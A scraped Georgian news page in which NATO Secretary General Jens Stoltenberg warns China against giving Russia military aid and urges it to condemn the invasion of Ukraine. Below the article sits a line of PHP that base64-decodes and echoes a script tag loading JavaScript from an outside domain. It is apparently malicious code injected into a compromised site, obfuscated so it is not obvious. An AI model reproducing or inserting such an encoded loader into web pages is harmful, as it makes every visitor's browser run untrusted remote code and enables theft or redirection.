celsiusi
ავერსი შნაიდერი
ნატოს გენერალურმა მდივანმა, იენს სტოლტენბერგმა განაცხადა, რიმ ნატომ ყველაფერი უნდა გააკეთოს იმისთვის, რომ მდგომარეობა უფრო მეტად არ დამძიმდეს.
 
მისივე თქმით, ჩინეთის მხრიდან რუსეთის მიმართ ნებისმიერი სამხედრო დახმარება მდგომარეობას კიდევ უფრო დაამძიმებს. 
 
"ჩვენი მთავარი პასუხისმგებლობა არის, რომ დავიცვათ ნატოს წევრი ყველა ქვეყანა, მათ შორის, 30 ქვეყანაში მყოფი მოსახლეობა. ერთ წევრ ქვეყანაზე შეტევა გააქტიურებს ომს, რომელიც გულისხმობს, რომ ყველა ქვეყანა ჩაერთვება ამ კონფლიქტში. როდესაც ვხედავთ ჩვენ კიდევ უფრო დიდ სამხედრო ინტერვენციას ნატოს საზღვრებთან, ჩვენ ყველაფერი უნდა გავაკეთოთ იმისათვის, რომ ეს ყველაფერი თავიდან ავიცილოთ, რათა კიდევ უფრო არ დამძიმდეს მდგომარეობა. ჩვენ ძალიან კარგად ვაკვირდებით საჰაერო სისტემებს, საჰაერო ცას და ნატოს გარშემო ვითარებას. ყველაფერს ვაკეთებთ იმისათვის, რომ არ გაგვექცეს მდგომარეობა და არ მოხდეს ესკალაცია.
 
ჩინეთი უნდა შეუერთდეს დანარჩენ მსოფლიოს, უნდა დაგმონ რუსეთის ინტერვენცია უკრაინაში. რუსეთისთვის ნებისმიერი სამხედრო დახმარება კიდევ უფრო დაამძიმებს მდგომარეობას და კიდევ უფრო გაუწევს მეტ პროვოცირებას რუსეთის აგრესიას სუვერენულ უკრაინაში და კიდევ უფრო გაზრდის ომის მასშტაბებს, სადაც ათასობით მშვიდობიანი მოსახლეობა იღუპება. ჩინეთს აქვს ვალდებულება, რომ დაემორჩილოს საერთაშორისო კანონებს და დაგმოს რუსეთის აგრესია უკრაინაში. ჩვენ მოვუწოდებთ ჩინეთს, რომ არ დაეხმაროს რუსეთს და დაგმოს რუსული აგრესია, ჩვენ ამ ყველაფერს ვაკვირდებით“, - განაცხადა ნატოს გენერალურმა მდივანმა, რომლის თარგმანსაც "რუსთავი2" ავრცელებს.
782
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");